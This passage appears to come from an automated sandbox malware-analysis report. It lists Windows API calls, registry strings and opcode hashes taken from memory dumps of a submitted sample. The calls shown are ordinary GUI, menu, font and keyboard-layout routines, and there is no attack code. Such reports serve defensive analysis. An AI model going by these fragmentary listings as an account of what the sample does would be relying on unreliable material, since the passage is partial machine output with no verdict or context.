                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ColorImageList_$Draw$Text
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2027629008-0
                                                                                                                                            • Opcode ID: 9618c621c1208eab8cff48776d25388c460c60d9bc86d5a04521d520bd902ec7
                                                                                                                                            • Instruction ID: bbf83a9395d711bf3399132c89881986b8b0642b8e2092ee4ece75f90191317a
                                                                                                                                            • Opcode Fuzzy Hash: 9618c621c1208eab8cff48776d25388c460c60d9bc86d5a04521d520bd902ec7
                                                                                                                                            • Instruction Fuzzy Hash: 0A511471B40214ABDB94EF6CCDC1FAE37AEAF89710F500160FA14EB285CA74EC459B65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetCapture.USER32 ref: 02A20715
                                                                                                                                            • GetCapture.USER32 ref: 02A20724
                                                                                                                                            • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 02A2072A
                                                                                                                                            • ReleaseCapture.USER32 ref: 02A2072F
                                                                                                                                            • GetActiveWindow.USER32 ref: 02A20780
                                                                                                                                            • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 02A20816
                                                                                                                                            • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 02A20883
                                                                                                                                            • GetActiveWindow.USER32 ref: 02A20892
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 862346643-0
                                                                                                                                            • Opcode ID: 0bc1f82dff31df04fcfb418306f4dee6a3dc58ea88933f8fb6e86c61bc7dcf17
                                                                                                                                            • Instruction ID: 88e2628341f6f186d3008cdbc5ed1419d575b4c0224ffab384870c8418c1213e
                                                                                                                                            • Opcode Fuzzy Hash: 0bc1f82dff31df04fcfb418306f4dee6a3dc58ea88933f8fb6e86c61bc7dcf17
                                                                                                                                            • Instruction Fuzzy Hash: BC515C30A40244EFEB11EFA8CA85BAEB7F6EF55700F1584A5E404AB661DB74AE44DF40
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SaveDC.GDI32(?), ref: 02A0FD79
                                                                                                                                              • Part of subcall function 02A08B74: GetWindowOrgEx.GDI32(00000000), ref: 02A08B82
                                                                                                                                              • Part of subcall function 02A08B74: SetWindowOrgEx.GDI32(00000000,00000000,00000000,00000000), ref: 02A08B98
                                                                                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 02A0FDB2
                                                                                                                                            • GetWindowLongA.USER32(00000000,000000EC), ref: 02A0FDC6
                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02A0FDE7
                                                                                                                                            • SetRect.USER32(?,00000000,00000000,?,?), ref: 02A0FE17
                                                                                                                                            • DrawEdge.USER32(?,?,00000000,00000000), ref: 02A0FE26
                                                                                                                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 02A0FE4F
                                                                                                                                            • RestoreDC.GDI32(?,?), ref: 02A0FECE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Rect$ClipIntersectLong$DrawEdgeRestoreSave
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2976466617-0
                                                                                                                                            • Opcode ID: dcade169b1d8525b4a8200cfcb1d732839c1cf79a3260cdee00ce02c665afb5f
                                                                                                                                            • Instruction ID: 6d45bbb43bbffd037ae81cd417f40fa5fb3edb044d72434b2ad98c83b1355cd9
                                                                                                                                            • Opcode Fuzzy Hash: dcade169b1d8525b4a8200cfcb1d732839c1cf79a3260cdee00ce02c665afb5f
                                                                                                                                            • Instruction Fuzzy Hash: A741FA75A00208AFDB10DBE8D9C1F9EB7BAEF48704F1181A1B604E7691CB34AE41DF50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetCapture.USER32 ref: 02A23BE2
                                                                                                                                            • IsWindowUnicode.USER32(00000000), ref: 02A23C25
                                                                                                                                            • SendMessageW.USER32(00000000,-0000BBEE,211367A0,?), ref: 02A23C40
                                                                                                                                            • SendMessageA.USER32(00000000,-0000BBEE,211367A0,?), ref: 02A23C5F
                                                                                                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 02A23C6E
                                                                                                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 02A23C7C
                                                                                                                                            • SendMessageA.USER32(00000000,-0000BBEE,211367A0,?), ref: 02A23C9C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1994056952-0
                                                                                                                                            • Opcode ID: c967fa25f372b36ebbd55f29f1fd7f346df7aac56da4345a4c5aa7dbfec4c185
                                                                                                                                            • Instruction ID: 22f1bd30d26911bd9bd63581eb8b3ee9126d85e20f025289e875c406154cfa53
                                                                                                                                            • Opcode Fuzzy Hash: c967fa25f372b36ebbd55f29f1fd7f346df7aac56da4345a4c5aa7dbfec4c185
                                                                                                                                            • Instruction Fuzzy Hash: 402191712042586FDA60FBADCD80F67B3DDEF46214B1094B5F959C3641DF18F8888B20
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetDC.USER32(00000000), ref: 029F3A76
                                                                                                                                            • GetDeviceCaps.GDI32(?,00000068), ref: 029F3A92
                                                                                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 029F3AB1
                                                                                                                                            • GetSystemPaletteEntries.GDI32(?,-00000008,00000001,00C0C0C0), ref: 029F3AD5
                                                                                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000007,?), ref: 029F3AF3
                                                                                                                                            • GetSystemPaletteEntries.GDI32(?,00000007,00000001,?), ref: 029F3B07
                                                                                                                                            • GetSystemPaletteEntries.GDI32(?,00000000,00000008,?), ref: 029F3B27
                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 029F3B3F
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EntriesPaletteSystem$CapsDeviceRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1781840570-0
                                                                                                                                            • Opcode ID: baec8cfc804772ab78515fad128278222b7ac79bb48edaa223326ccd3ea67f3f
                                                                                                                                            • Instruction ID: 1a39741a2ab509cba85bd53e975822c4bcb39dde4d22c3375b7918e75ba44d6d
                                                                                                                                            • Opcode Fuzzy Hash: baec8cfc804772ab78515fad128278222b7ac79bb48edaa223326ccd3ea67f3f
                                                                                                                                            • Instruction Fuzzy Hash: 5D21A1B1A00208BEEB50EBA5DD84FAEB3BCEB88704F504495F704E7180D775AE409B28
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetVersion.KERNEL32(00000000,029FFBED), ref: 029FFA38
                                                                                                                                            • InsertMenuItemA.USER32(?,000000FF,000000FF,0000002C), ref: 029FFB41
                                                                                                                                              • Part of subcall function 029FFEA0: CreatePopupMenu.USER32 ref: 029FFEBB
                                                                                                                                            • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 029FFBCA
                                                                                                                                              • Part of subcall function 029FFEA0: CreateMenu.USER32 ref: 029FFEC5
                                                                                                                                            • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 029FFBB1
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Menu$Insert$Create$ItemPopupVersion
                                                                                                                                            • String ID: ,$?
                                                                                                                                            • API String ID: 2359071979-2308483597
                                                                                                                                            • Opcode ID: dc0a640e3bc52e98391c6214dfec08ebdf79ef214972e106399b2dd6ee37e680
                                                                                                                                            • Instruction ID: 8c2128c1e0445b9c77a6a7222dac61eb703e9d7b559049b27f38002804d1139b
                                                                                                                                            • Opcode Fuzzy Hash: dc0a640e3bc52e98391c6214dfec08ebdf79ef214972e106399b2dd6ee37e680
                                                                                                                                            • Instruction Fuzzy Hash: 35613430E042549FDBD0EFA8D880AAE77FAAF46300B4448A5EA40E76D9E735D915DF60
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SetWindowPos.USER32(00000000,000000FF,?,?,?,?,00000010,00000000,02A138EC), ref: 02A137ED
                                                                                                                                            • GetTickCount.KERNEL32 ref: 02A137F2
                                                                                                                                            • SystemParametersInfoA.USER32(00001016,00000000,?,00000000), ref: 02A13836
                                                                                                                                            • SystemParametersInfoA.USER32(00001018,00000000,00000000,00000000), ref: 02A1384E
                                                                                                                                            • AnimateWindow.USER32(00000000,00000064,?), ref: 02A13893
                                                                                                                                            • ShowWindow.USER32(00000000,00000004,00000000,000000FF,?,?,?,?,00000010,00000000,02A138EC), ref: 02A138B6
                                                                                                                                              • Part of subcall function 02A16EC8: GetCursorPos.USER32(?), ref: 02A16ECC
                                                                                                                                            • GetTickCount.KERNEL32 ref: 02A138D3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$CountInfoParametersSystemTick$AnimateCursorShow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3024527889-0
                                                                                                                                            • Opcode ID: 91f56b8afb65d42316802f5a4262722d570de88f96dddfa4c68e479430946a95
                                                                                                                                            • Instruction ID: 97ffdb7d4edd758fa4babe454c4d2910770ce598649a221ed3515190fb2901fb
                                                                                                                                            • Opcode Fuzzy Hash: 91f56b8afb65d42316802f5a4262722d570de88f96dddfa4c68e479430946a95
                                                                                                                                            • Instruction Fuzzy Hash: FE515D74A40205EFEB10DFA8CA85AAEB7F6EF44314F2085A0E504EB250DB70EE45DF90
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 02A254A8: GetActiveWindow.USER32 ref: 02A254CF
                                                                                                                                              • Part of subcall function 02A254A8: GetLastActivePopup.USER32(?), ref: 02A254E1
                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 02A2417E
                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 02A241B6
                                                                                                                                            • MessageBoxA.USER32(00000000,?,?,?), ref: 02A241F5
                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,02A2426B), ref: 02A24245
                                                                                                                                            • SetActiveWindow.USER32(00000000,02A2426B), ref: 02A24256
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$Active$LastMessagePopupRect
                                                                                                                                            • String ID: (
                                                                                                                                            • API String ID: 3456420849-3887548279
                                                                                                                                            • Opcode ID: 3aae614af262af35c5a02a92f2142531e1f2dc6eff0cbb2fb5699dfebaccaf0a
                                                                                                                                            • Instruction ID: 66b5de79dae58c3d3a842c9a460ed0f30af0b11845e1d1d19718413b6424f91b
                                                                                                                                            • Opcode Fuzzy Hash: 3aae614af262af35c5a02a92f2142531e1f2dc6eff0cbb2fb5699dfebaccaf0a
                                                                                                                                            • Instruction Fuzzy Hash: F251F575E40218AFDB04DBE8DD91FAEB7B9FB88700F148459E900EB395DB74AD058B50
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetKeyboardLayoutList.USER32(00000040,?,00000000,02A21B83,?,2113D9D0,?,02A21BE5,00000000,?,02A0D22F), ref: 02A21A2E
                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,00000000), ref: 02A21A96
                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,layout text,00000000,00000000,?,00000100,00000000,02A21B3F,?,80000002,00000000), ref: 02A21AD0
                                                                                                                                            • RegCloseKey.ADVAPI32(?,02A21B46,00000000,?,00000100,00000000,02A21B3F,?,80000002,00000000), ref: 02A21B39
                                                                                                                                            Strings
                                                                                                                                            • System\CurrentControlSet\Control\Keyboard Layouts\%.8x, xrefs: 02A21A80
                                                                                                                                            • layout text, xrefs: 02A21AC7
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseKeyboardLayoutListOpenQueryValue
                                                                                                                                            • String ID: System\CurrentControlSet\Control\Keyboard Layouts\%.8x$layout text
                                                                                                                                            • API String ID: 1703357764-2652665750
                                                                                                                                            • Opcode ID: f3ff36fdcac84be1eacba5adacfd77e4178fd8617626384475258e0e5af2ceb5
                                                                                                                                            • Instruction ID: 77e51eb5444ce1f0dfa73f34461e3be5814c2f9cc3e3a5597e5178b9e966af2a
                                                                                                                                            • Opcode Fuzzy Hash: f3ff36fdcac84be1eacba5adacfd77e4178fd8617626384475258e0e5af2ceb5
                                                                                                                                            • Instruction Fuzzy Hash: 1A412A74A00259AFEB11DF58C980BDEB7F9FB48700F5184E1E908E7251EB70AE449F61
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 02A23E00
                                                                                                                                            • IsWindowUnicode.USER32 ref: 02A23E14
                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02A23E35
                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 02A23E4B
                                                                                                                                            • TranslateMessage.USER32 ref: 02A23ED4
                                                                                                                                            • DispatchMessageW.USER32 ref: 02A23EE0
                                                                                                                                            • DispatchMessageA.USER32 ref: 02A23EE8
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message$Peek$Dispatch$TranslateUnicodeWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2190272339-0
                                                                                                                                            • Opcode ID: 1b4e5e0ead8f83c3ef484e42be75aff2e002ff7048052068103b996815a0638c
                                                                                                                                            • Instruction ID: ddda14528a7027ef715d58eb578ba931d65dd06584981994c43e054e24ea7437
                                                                                                                                            • Opcode Fuzzy Hash: 1b4e5e0ead8f83c3ef484e42be75aff2e002ff7048052068103b996815a0638c
                                                                                                                                            • Instruction Fuzzy Hash: 6621F62074836067EE317B2C4D81BBF92DA4F93B48F1484D9E98197182DFEE944E8E12
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02A1D161
                                                                                                                                            • GetWindowLongA.USER32(00000000,000000EC), ref: 02A1D173
                                                                                                                                            • GetClassLongA.USER32(00000000,000000E6), ref: 02A1D186
                                                                                                                                            • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02A1D1C6
                                                                                                                                            • SetWindowLongA.USER32(00000000,000000EC,?), ref: 02A1D1DA
                                                                                                                                            • SetClassLongA.USER32(00000000,000000E6,?), ref: 02A1D1EE
                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000233,00000000,000000E6,?,00000000,000000EC,?,00000000,000000F0,00000000), ref: 02A1D20A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Long$Window$Class
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2026531576-0
                                                                                                                                            • Opcode ID: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
                                                                                                                                            • Instruction ID: e9425bc0438212106aaecbbab04d802ededc2c5a15d56e637b0831c3af81eece
                                                                                                                                            • Opcode Fuzzy Hash: a955475e008342a39e440602636dbc793ab62fdf25f557567a4f0dff511511b1
                                                                                                                                            • Instruction Fuzzy Hash: C421D53430868166CA05A77C8D84AFEF79B5FC1328F188656F4A4972D0CF74D845DB52
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 02A21D79
                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 02A21D86
                                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 02A21D9C
                                                                                                                                              • Part of subcall function 029F2518: MulDiv.KERNEL32(00000000,?,00000048), ref: 029F2525
                                                                                                                                            • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 02A21DC5
                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 02A21DD5
                                                                                                                                            • CreateFontIndirectA.GDI32(?), ref: 02A21DEE
                                                                                                                                            • GetStockObject.GDI32(0000000D), ref: 02A21E14
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2891467149-0
                                                                                                                                            • Opcode ID: 39080a7089ab3cf22950cb2489dc974b134851296e23ccc05a439607c726b1f2
                                                                                                                                            • Instruction ID: 82e5a6e011f74d3b200ee4867e1e0891b27ee99ca8f6a5630035b55bad705b81
                                                                                                                                            • Opcode Fuzzy Hash: 39080a7089ab3cf22950cb2489dc974b134851296e23ccc05a439607c726b1f2
                                                                                                                                            • Instruction Fuzzy Hash: A131A430B452549BEB94EB68DC94B9933F9EB84300F8584B0AE4CDB286DF749909DF21
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 029DC91C: GetFileVersionInfoSizeA.VERSION(00000000,?,00000000,029DC9F2), ref: 029DC95E
                                                                                                                                              • Part of subcall function 029DC91C: GetFileVersionInfoA.VERSION(00000000,?,00000000,?,00000000,029DC9D5,?,00000000,?,00000000,029DC9F2), ref: 029DC993
                                                                                                                                              • Part of subcall function 029DC91C: VerQueryValueA.VERSION(?,029DCA04,?,?,00000000,?,00000000,?,00000000,029DC9D5,?,00000000,?,00000000,029DC9F2), ref: 029DC9AD
                                                                                                                                            • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 02A26CA4
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx), ref: 02A26CB5
                                                                                                                                            • ImageList_Write.COMCTL32(00000000,?,00000000,02A26D6A), ref: 02A26D34
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileInfoVersion$AddressHandleImageList_ModuleProcQuerySizeValueWrite
                                                                                                                                            • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                                                                                                                            • API String ID: 4063495462-3125200627
                                                                                                                                            • Opcode ID: 1ec27bfa369c743f400a784621cb40f8bbe479b63a0756a61cbd54442cd939cc
                                                                                                                                            • Instruction ID: 8e7e1354861e13258d946f0c2389c006401763d24c985ca0e3b13af52c5ea9a4
                                                                                                                                            • Opcode Fuzzy Hash: 1ec27bfa369c743f400a784621cb40f8bbe479b63a0756a61cbd54442cd939cc
                                                                                                                                            • Instruction Fuzzy Hash: BE21A430745B54ABE714BB7ED894B2A37BEEB84B09B405428E901E7251DF75E808DE10
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • GetKeyboardLayoutNameA.USER32(00000000), ref: 02A03030
                                                                                                                                              • Part of subcall function 029F02A4: RegCloseKey.ADVAPI32(10940000,029F0180,00000001,029F0222,?,?,029F76BA,00000008,00000060,00000048,00000000,029F775F), ref: 029F02B8
                                                                                                                                              • Part of subcall function 029F0308: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,00000000,029F04A2), ref: 029F0374
                                                                                                                                              • Part of subcall function 029DDC04: SetErrorMode.KERNEL32 ref: 029DDC0E
                                                                                                                                              • Part of subcall function 029DDC04: LoadLibraryA.KERNEL32(00000000,00000000,029DDC58,?,00000000,029DDC76), ref: 029DDC3D
                                                                                                                                            • GetProcAddress.KERNEL32(?,KbdLayerDescriptor), ref: 02A030C1
                                                                                                                                            • FreeLibrary.KERNEL32(?,02A030FB,?,00000000,02A0313B), ref: 02A030EE
                                                                                                                                            Strings
                                                                                                                                            • \SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 02A03075
                                                                                                                                            • KbdLayerDescriptor, xrefs: 02A030B8
                                                                                                                                            • Layout File, xrefs: 02A0308D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000000.00000002.1687014066.00000000029D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 029D0000, based on PE: true
                                                                                                                                            • Associated: 00000000.00000002.1686998877.00000000029D0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002A3A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000000.00000002.1687346771.0000000002B5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_0_2_29d0000_SecuriteInfo.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Library$AddressCloseErrorFreeKeyboardLayoutLoadModeNameOpenProc
                                                                                                                                            • String ID: KbdLayerDescriptor$Layout File$\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\
